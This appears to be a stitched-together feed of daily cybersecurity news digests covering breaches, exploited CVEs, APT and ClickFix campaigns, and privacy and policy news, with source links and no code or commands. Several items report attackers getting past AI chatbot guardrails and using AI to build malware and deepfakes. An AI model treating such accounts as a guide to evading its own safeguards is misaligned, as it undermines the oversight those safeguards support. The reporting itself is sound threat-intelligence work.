Alright team, it's been a pretty packed 24 hours in the cyber world! We've got some significant breaches to cover, a raft of actively exploited vulnerabilities, and a deep dive into how threat actors are increasingly leveraging AI for everything from malware generation to sophisticated social engineering. Let's get stuck in:

Recent Cyber Attacks and Breaches 🚨

- The FBI is investigating a breach of its systems used to manage surveillance and wiretap warrants, though details on scope and impact are limited. This follows previous incidents, including a 2024 compromise by Chinese Salt Typhoon hackers targeting US government wiretapping platforms via telecom networks.
- Transport for London (TfL) has confirmed that a 2024 breach exposed data for over 7 million customers, a significant increase from the initially reported 5,000. While only 5,000 had bank account data potentially accessed, the larger figure represents the total dataset sitting in the compromised systems.
- The son of a US government contractor has been arrested in the Caribbean, accused of stealing over $46 million in seized cryptocurrency from the US Marshals Service. The alleged theft, traced by blockchain investigators, involved funds from previous seizures, including a portion linked to the 2016 Bitfinex hack.
- A small group of hacktivists compromised at least nine Mexican government agencies, stealing over 195 million identities and tax records, plus other sensitive data. The attackers notably used Anthropic's Claude and OpenAI's ChatGPT, bypassing their guardrails within 40 minutes to find vulnerabilities and build attack tools.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fbi-investigates-breach-of-surveillance-and-wiretap-systems/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/tfl_2024_breach_numbers/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/contractor_son_crypto_arrest/
🕶️ Dark Reading | https://www.darkreading.com/application-security/cyberattack-mexico-government-ai-threat

Actively Exploited Vulnerabilities and Zero-Days 🛡️

- Google's Threat Intelligence Group reported 90 actively exploited zero-days in 2025, with enterprise tech products seeing an all-time high of 43. China-linked cyber-espionage groups were the most prolific state-backed actors, particularly targeting security and networking edge devices.
- CISA has ordered federal agencies to patch three iOS security flaws (CVE-2023-41974, CVE-2021-30952, CVE-2023-43000) actively exploited by the Coruna exploit kit. Coruna, a sophisticated spyware-grade kit, has been used by surveillance vendors, suspected Russian state-backed groups, and financially motivated Chinese actors for cyberespionage and crypto-theft.
- Two critical-severity flaws, CVE-2017-7921 (Hikvision) and CVE-2021-22681 (Rockwell Automation), with CVSS scores of 9.8, have been added to CISA's KEV catalog due to active exploitation. Federal agencies must patch these by March 26, 2026, with all organisations strongly urged to do the same.
- Cisco has warned of two more actively exploited vulnerabilities in its Catalyst SD-WAN Manager: CVE-2026-20122 (CVSS 7.1) allowing arbitrary file overwrites, and CVE-2026-20128 (CVSS 5.5) for information disclosure. This follows a recent Five Eyes alert about other SD-WAN flaws, highlighting persistent targeting of these critical network devices.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cisa-warns-of-apple-flaws-exploited-in-spyware-crypto-theft-attacks/
📰 The Hacker News | https://thehackernews.com/2026/03/hikvision-and-rockwell-automation-cvss.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/cisco_sdwan_bugs/

New Threat Research and Tradecraft 🕵️‍♀️

- Europol, alongside Microsoft, Trend Micro, and Cloudflare, has disrupted Tycoon 2FA, a major phishing-as-a-service (PhaaS) platform. Tycoon 2FA was notorious for its adversary-in-the-middle (AitM) attacks that bypassed traditional MFA by relaying authentication prompts in real-time to steal session tokens.
- Microsoft has detailed a new ClickFix social engineering campaign that leverages the Windows Terminal app to deploy the Lumma Stealer malware. Attackers instruct users to launch Windows Terminal and paste hex-encoded, XOR-compressed commands, bypassing traditional Run dialog detections and blending into legitimate administrative workflows.
- A new InstallFix technique, a variation of ClickFix, is being used to push info-stealing malware like Amatera via fake CLI tool installation guides. Threat actors promote these cloned pages, often hosted on legitimate platforms like Squarespace, through malvertising on Google Ads, tricking users into executing malicious `curl-to-bash` commands.
- Bing AI's search feature was observed promoting fake OpenClaw GitHub repositories that pushed information-stealing and proxy malware. Threat actors created seemingly legitimate GitHub organisations and repositories, which were then recommended by Bing AI, leading users to install Atomic Stealer or Vidar stealer and GhostSocks proxy malware.
- A China-linked APT, UAT-9244 (associated with FamousSparrow and Tropic Trooper), is targeting South American telecom providers with a new malware toolkit. This includes TernDoor (Windows backdoor), PeerTime (Linux backdoor using BitTorrent for C2), and BruteEntry (a brute-force scanner building proxy infrastructure).
- The Pakistan-aligned Transparent Tribe APT is using AI-powered coding tools to mass-produce "vibeware" malware implants in a campaign targeting India. This "Distributed Denial of Detection" (DDoD) strategy involves flooding targets with high-volume, mediocre binaries written in lesser-known languages like Nim, Zig, and Crystal, relying on trusted services for C2.
- North Korean APTs Jasper Sleet and Coral Sleet are enhancing their IT worker scams with AI to improve scale and precision. AI assists in fabricating convincing digital identities, generating resumes and cover letters, maintaining personas during interviews (including voice-changing software), and even developing malware and automating attack workflows.
- Iran has reportedly unified cyber and kinetic attacks into a single doctrine, leveraging IP camera compromises for operational support and battle damage assessment during missile strikes. Check Point Research observed intensified targeting of Hikvision and Dahua cameras in the Middle East, with activity patterns correlating with kinetic events.

🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/tycoon-2fa-europol-vendors-bust-phishing-platform
📰 The Hacker News | https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fake-claude-code-install-guides-push-infostealers-in-installfix-attacks/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/
📰 The Hacker News | https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html
🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/north-korean-apts-ai-it-worker-scams
🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/iran-cyber-kinetic-war-doctrine

Regulatory Issues and Data Privacy ⚖️

- The House Energy and Commerce Committee advanced the Kids Internet and Digital Safety (KIDS) Act in a party-line vote, drawing criticism from Democrats for perceived weak regulations. Concerns include a "toothless" knowledge standard for tech companies, lack of a "duty of care" to proactively mitigate harms, and preemption language that could undercut stronger state laws.
- Other bills marked up include Sammy's Law, aiming to notify parents of child risk on third-party safety apps, and the App Store Accountability Act, requiring parental consent for app downloads by minors. Digital freedom advocates criticised these bills for potentially threatening privacy and free expression by pushing age assurance techniques.

🗞️ The Record | https://therecord.media/house-panel-marks-up-kids-digital-safety-act

Government Staffing and Program Changes 🏛️

- The Department of Homeland Security (DHS) is undergoing a significant IT and information security leadership overhaul, with CISO Hemant Baidwan and Deputy CISO Amanda Day reportedly being replaced. This realignment, led by DHS CIO Antoine McCord, aims to centralise IT control and follows other high-profile departures at CISA and FEMA.
- Congress is moving to reauthorise and fund the Rural and Municipal Utility Advanced Cybersecurity program at the Department of Energy, approving $250 million in grants over five years. This program is crucial for smaller utilities, often lacking robust cybersecurity operations, to defend against escalating threats, including those from nation-state actors like Volt Typhoon.

🤫 CyberScoop | https://fedscoop.com/dhs-it-leadership-overhaul-includes-ciso-deputy-ciso/
🤫 CyberScoop | https://cyberscoop.com/house-committee-advances-rural-utility-cybersecurity-act/

Cybercrime and Law Enforcement 💰

- A Ghanaian national, Derrick Van Yeboah, has pleaded guilty to his role in a $100 million fraud ring involving business email compromise (BEC) attacks and romance scams. Yeboah, a high-ranking member of the Ghana-based operation, personally conducted many romance scams, contributing to over $10 million in losses.
- The scammers targeted vulnerable individuals online, tricking them into depositing money into US middlemen's accounts, and also defrauded businesses via spoofed emails. Yeboah faces up to 20 years in prison and has agreed to pay over $10 million in restitution.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ghanain-man-pleads-guilty-to-role-in-100-million-fraud-ring/

#CyberSecurity #ThreatIntelligence #InfoSec #CyberAttack #ZeroDay #Vulnerability #APT #Malware #Phishing #AI #SocialEngineering #DataPrivacy #GovernmentSecurity #LawEnforcement #IncidentResponse

CNN: Exclusive: DHS admits its website showcasing the ‘worst of the worst’ immigrants was rife with errors. “The Department of Homeland Security admitted that its website featuring what it calls the ‘worst of the worst’ arrested immigrants was rife with errors and changed the site this week after receiving questions from CNN about it.”

Looks like a busy 24 hours in the cyber world with some significant breaches, new malware insights, a critical Patch Tuesday, and important discussions around AI and government security. Let's dive in:

Healthcare Data Breach and Payroll Scams 🚨
- ApolloMD, a Georgia-based healthcare company, reported a data breach impacting over 626,000 individuals, with sensitive health information compromised by the Qilin ransomware gang.
- Law enforcement in the Netherlands arrested a third suspect involved in the JokerOTP phishing-as-a-service operation, which caused over $10 million in losses by intercepting MFA passcodes across 28,000 attacks.
- "Payroll pirates" are exploiting help desks through social engineering to reset employee credentials and MFA, then using internal VDI to access payroll systems like Workday and redirect paychecks, highlighting the need to treat identity as the new perimeter.

🗞️ The Record | https://therecord.media/georgia-healthcare-company-data-breach-impacts-620000
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/police-arrest-seller-of-jokerotp-mfa-passcode-capturing-tool/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/payroll_pirates_business_social_engineering/

North Korean Deepfakes, LummaStealer Resurgence, and IRC Botnets 🛡️
- North Korea's UNC1069 group is targeting the cryptocurrency sector with sophisticated social engineering, using AI-generated deepfake videos in fake Zoom meetings and the ClickFix technique to deploy seven new macOS malware families (WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, CHROMEPUSH) for extensive data exfiltration and TCC bypass.
- LummaStealer (LummaC2) infostealer infections are surging again, now primarily delivered via the heavily obfuscated CastleLoader malware, which uses ClickFix techniques and performs environment checks to evade analysis before deploying its payload.
- The "Crazy" ransomware gang is leveraging legitimate employee monitoring software (Net Monitor for Employees Professional) and remote support tools (SimpleHelp) for persistence, detection evasion, and pre-ransomware reconnaissance, including monitoring for cryptocurrency wallet activity, often gaining initial access through compromised SSL VPN credentials.
- A new Linux botnet, SSHStalker, is using the antiquated IRC protocol for command-and-control, relying on noisy SSH scanning, cron-based persistence, and a large arsenal of 15-year-old Linux kernel exploits (2.6.x era) to compromise systems, with observed capabilities for AWS key harvesting, cryptomining, and DDoS.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-new-macos-malware-in-crypto-theft-attacks/
📰 The Hacker News | https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/lummastealer-infections-surge-after-castleloader-malware-campaigns/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/crazy-ransomware-gang-abuses-employee-monitoring-tool-in-attacks/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/new-linux-botnet-sshstalker-uses-old-school-irc-for-c2-comms/
📰 The Hacker News | https://thehackernews.com/2026/02/sshstalker-botnet-uses-irc-c2-to.html

Microsoft's Patch Tuesday: Six Actively Exploited Zero-Days ⚠️
- Microsoft's February Patch Tuesday addressed 59 vulnerabilities, including six actively exploited zero-days, prompting CISA to add them to its Known Exploited Vulnerabilities (KEV) catalog for urgent patching by federal agencies.
- Three of the actively exploited flaws are security feature bypasses (CVE-2026-21510 in Windows Shell, CVE-2026-21513 in MSHTML, CVE-2026-21514 in Word) that can lead to remote code execution (RCE) by tricking users into opening malicious files or links, bypassing SmartScreen and OLE security controls.
- The remaining actively exploited bugs include two elevation-of-privilege vulnerabilities (CVE-2026-21519 in Desktop Window Manager, CVE-2026-21533 in Windows Remote Desktop Services) and one denial-of-service flaw (CVE-2026-21525 in Windows Remote Access Connection Manager).
- A new RCE vulnerability, CVE-2026-20841, has been found in Notepad's recently added Markdown feature, allowing attackers to launch "unverified protocols" and execute files if a user clicks a malicious embedded link, though no in-the-wild exploitation has been observed yet.

💡 Dark Reading | https://www.darkreading.com/vulnerabilities-threats/microsoft-fixes-6-actively-exploited-zero-days
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/10/microsofts_valentines_gift_to_admins/
📰 The Hacker News | https://thehackernews.com/2026/02/microsoft-patches-59-vulnerabilities.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/notepad_rce_flaw/

Telnet's Lingering Legacy and Potential Pre-Disclosure Warnings 🌐
- Threat intelligence suggests that major telcos likely received advance warning about the critical Telnet vulnerability (CVE-2026-24061) before its public disclosure, as global Telnet traffic "fell off a cliff" days prior, indicating potential pre-advisory port 23 filtering by Tier 1 transit providers.
- Despite a global decline in Telnet traffic, the Asia-Pacific region continues to show high exposure, with many consumer-grade routers and IoT devices still using the insecure protocol, highlighting a persistent and unnecessary attack surface.
- The reduction in Telnet traffic, particularly in the US, might be an unintended positive consequence of network infrastructure providers blocking aggressive web-scraping traffic from AI companies, as the congestion caused by such activity forced broader filtering adjustments.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/were_telcos_tipped_off_to/
💡 Dark Reading | https://www.darkreading.com/threat-intelligence/asia-fumbles-telnet-threat-traffic

AI's Privacy Pitfalls: Caricatures, Healthcare, and Data Blind Spots 🔒
- The viral trend of posting AI-generated work caricatures on social media poses significant risks, as users may inadvertently expose sensitive company data from their LLM prompt history, making them targets for social engineering and account takeovers.
- AI health apps, despite offering "HIPAA-ready" or "HIPAA-compliant" infrastructure, are generally not subject to the same rigorous data protection laws (like HIPAA) as traditional healthcare providers, raising concerns about the privacy and security of personal medical data shared with these unregulated entities.
- Organisations are widely adopting AI without sufficient knowledge of the data populating these tools; a recent survey found only 11% of IT decision-makers are confident they can account for 100% of their data, creating a "data knowledge disconnect" that risks sensitive data leakage and regulatory non-compliance.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/ai_caricatures_social_media_bad_security/
🤫 CyberScoop | https://cyberscoop.com/ai-healthcare-apps-hipaa-privacy-risks-openai-anthropic/
💡 Dark Reading | https://www.darkreading.com/data-privacy/do-we-know-enough-about-data-populating-ai

Government Data Security and Digital Control 🏛️
- The UK government is struggling with legacy IT systems that hinder secure information sharing, contributing to incidents like the Afghan data breach, and making it difficult to implement technical measures to prevent human error in data leaks.
- Russia's communications regulator, Roskomnadzor, is deliberately throttling Telegram and pushing its state-controlled messaging app, Max, citing non-compliance with Russian law, a move criticised internally for potentially impacting emergency communications in border regions.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/11/legacy_systems_blamed_as_ministers_promise_no_repeat_of_afghan_breach/
🗞️ The Record | https://therecord.media/russia-throttles-telegram-pushes-its-own-messaging-app

CISA Shutdown Concerns and Leadership Appointments 🇺🇸
- The interim CISA chief warned Congress that a government shutdown would severely degrade the agency's capacity to provide timely guidance and conduct proactive threat hunting, forcing over a third of its frontline security experts to work without pay while cyber threats persist.
- Army Lt. Gen. Joshua Rudd, despite lacking prior cyber warfare or intelligence experience, has advanced to the full Senate for confirmation as the next head of U.S. Cyber Command and the National Security Agency, filling a 10-month leadership void.

🗞️ The Record | https://therecord.media/interim-cisa-chief-tells-congress-threats-continue-during-shutdown
🗞️ The Record | https://therecord.media/cyber-command-nsa-nominee-rudd-advances-to-senate

#CyberSecurity #ThreatIntelligence #Ransomware #Malware #ZeroDay #Vulnerability #PatchTuesday #SocialEngineering #AI #DataPrivacy #InfoSec #CyberAttack #IncidentResponse #GovernmentSecurity #NationState

🚨 Alleged breach targets Spain’s Ministry of Science
Threat actor claims IDOR flaw exposed passports, DNI/NIE records & financial data.

https://www.technadu.com/alleged-data-breach-targets-spains-ministry-of-science-innovation-and-universities/619485/

#InfoSec #DataBreach #IDOR #GovernmentSecurity #Spain

Belgian government institutions including federal and provincial websites, and key energy entities were reportedly targeted with large-scale DDoS attacks by a pro-Russian hacker group ahead of a major EU summit.

#CyberSecurity #DDoSAttack #GovernmentSecurity #InfosecK2K

An alleged ransomware incident involving government infrastructure in Baja California, Mexico has been claimed by a threat actor group, with the situation currently pending verification.

This case underscores recurring challenges in public-sector incident response: validating threat claims, managing disclosure timelines, and coordinating across agencies without amplifying unconfirmed information.

How should public-sector SOCs handle externally imposed ransom deadlines?

Source: https://www.linkedin.com/posts/hackmanac_cyberattack-alert-mexico-gobierno-activity-7414283719991255040-Uw_g/

Share insights and follow @technadu for unbiased infosec coverage.

#ThreatIntel #GovernmentSecurity #IncidentResponse #Ransomware #CyberInvestigations #Infosec

Alright team, it's been a busy 24 hours in the cyber world with significant updates on nation-state activity, a couple of actively exploited vulnerabilities, new malware campaigns, and some serious data privacy discussions. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- France's Interior Ministry is investigating a malicious cyber intrusion into its email servers, confirming unauthorised access to several accounts and dozens of confidential documents, including judicial records and wanted persons' data.
- Analytics vendor Mixpanel denies being the source of data stolen from Pornhub, stating the data was last accessed by a legitimate Pornhub employee account in 2023, not during Mixpanel's November 2025 security incident.
- Threat actors are exploiting WhatsApp's legitimate device-linking feature in a campaign dubbed "GhostPairing," tricking users with fake Facebook verification pages to link the attacker's browser to their WhatsApp account, gaining full conversation history access.
- European law enforcement has dismantled two Ukraine-based call centre networks responsible for over $13.7 million in scams, where criminals posed as police or bank employees to trick victims into transferring funds or installing remote access software.
- The FTC has ordered blockchain company Illusory Systems to distribute approximately $37.5 million in recovered funds to customers affected by the 2022 Nomad crypto platform hack, which saw $186 million stolen due to inadequately tested code.

🗞️ The Record | https://therecord.media/france-interior-ministry-email-breach-investigation
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/16/mixpanel_breach_leak_denial/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/whatsapp-device-linking-abused-in-account-hijacking-attacks/
🗞️ The Record | https://therecord.media/european-police-bust-ukraine-based-call-centers
🗞️ The Record | https://therecord.media/ftc-settlement-nomad-platform-return-customers-cryptocurrency

Vulnerabilities: Zero-Days & Active Exploitation 🛡️

- SonicWall has warned customers to patch a medium-severity local privilege escalation flaw (CVE-2025-40602) in its SMA1000 Appliance Management Console, which is being chained with a critical pre-authentication deserialisation flaw (CVE-2025-23006) for unauthenticated remote code execution with root privileges.
- The critical React2Shell vulnerability (CVE-2025-55182), an insecure deserialisation issue in React Server Components, is being actively exploited by a ransomware gang (Weaxor) to gain initial access and deploy encryptors in under a minute.
- System administrators should review Windows event logs and EDR telemetry for process creation from Node or React binaries, as well as unusual outbound connections or disabled security solutions, as patching alone might not be sufficient due to the speed of exploitation.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-react2shell-flaw-exploited-in-ransomware-attacks/

New Threat Research: APTs, Malware & Tradecraft 🕵️‍♀️

- The Russian state-sponsored APT28 (BlueDelta) has been conducting a sustained credential-harvesting campaign targeting Ukrainian UKR.net webmail users since June 2024, using fake login pages on legitimate services like Mocky and shortened links in PDF attachments.
- Amazon security researchers report that Russia’s GRU (APT44/Sandworm) has shifted tactics since 2025, now primarily targeting misconfigured network edge devices in Western critical infrastructure, particularly the energy sector, instead of relying on novel vulnerabilities.
- China-linked threat actor Ink Dragon (Jewelbug) is increasingly targeting government entities in Europe, Southeast Asia, and South America, leveraging vulnerable web applications to deploy web shells, ShadowPad IIS Listener modules, and an updated FINALDRAFT backdoor for stealthy, long-term persistence and data exfiltration.
- Operation ForumTroll, an unknown threat actor, is targeting Russian scholars in political science and economics with personalised phishing emails disguised as eLibrary plagiarism reports, delivering the Tuoni C2 framework via malicious LNK files and PowerShell scripts.
- A new Android Malware-as-a-Service (MaaS) called Cellik is being advertised, offering the ability to embed itself into any Google Play Store app, stream screens, intercept notifications, exfiltrate files, and use a hidden browser mode.
- The "GhostPoster" malware has been found in 17 Firefox add-ons with over 50,000 downloads, using steganography in logo files to embed malicious JavaScript that hijacks affiliate links, injects tracking code, strips security headers, and performs ad/click fraud.
- Forensic researchers have discovered "ResidentBat," a previously unknown Android spyware, on a Belarusian journalist's phone, believed to have been installed during KGB detention and capable of accessing call logs, messages, microphone recordings, and files.

📰 The Hacker News | https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html
🗞️ The Record | https://therecord.media/russian-bluedelta-hackers-ran-phishing-ukraine-webmail
🗞️ The Record | https://therecord.media/russia-gru-hackers-target-energy-sector-sandworm
📰 The Hacker News | https://thehackernews.com/2025/12/china-linked-ink-dragon-hacks.html
📰 The Hacker News | https://thehackernews.com/2025/12/new-forumtroll-phishing-attacks-target.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/cellik-android-malware-builds-malicious-versions-from-google-play-apps/
📰 The Hacker News | https://thehackernews.com/2025/12/ghostposter-malware-found-in-17-firefox.html
🗞️ The Record | https://therecord.media/spyware-belarus-journalist-rsf

Data Privacy Concerns 🔒

- Four popular browser extensions (Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker) have been caught harvesting text from AI chatbot conversations (ChatGPT, Claude, Gemini, etc.) from over 8 million users and sending it to developers, despite some claiming privacy protection.
- Meta has rolled out a new policy to personalise content and ad recommendations based on users' interactions with its generative AI features, with no opt-out option, raising significant privacy concerns among experts about the use of sensitive chat data.
- Digital rights organisation noyb alleges that TikTok and Grindr are violating European GDPR laws by tracking user activities across apps, with TikTok reportedly acknowledging it tracked a user's Grindr activity and other app usage, including shopping cart items.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/16/chrome_edge_privacy_extensions_quietly/
🗞️ The Record | https://therecord.media/privacy-advocates-see-risks-meta-ai-ad-targeting
🗞️ The Record | https://therecord.media/tiktok-grindr-data-tracking-noyb

Government & Defence Strategy 🏛️

- NATO's Assistant Secretary General for Cyber and Digital Transformation stressed the existential urgency for the alliance to develop sovereign cloud-based technologies, highlighting the need for speed, collaboration, and designing systems that enhance autonomy and allied trust.
- Outgoing GAO chief Gene Dodaro warned lawmakers that the U.S. is "very vulnerable" to cyber threats and expressed concern that CISA is "taking our foot off the gas," having lost about a third of its staff, and urged for a permanent director to be confirmed swiftly.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/12/17/sovereign_cloud_is_existential_nato/
🤫 CyberScoop | https://fedscoop.com/cisa-workforce-threats-gao-cybersecurity-gene-dodaro/

#CyberSecurity #ThreatIntelligence #APT #Ransomware #Malware #ZeroDay #Vulnerability #DataPrivacy #InfoSec #CyberAttack #NationState #Phishing #SocialEngineering #CloudSecurity #GovernmentSecurity #CISA #GDPR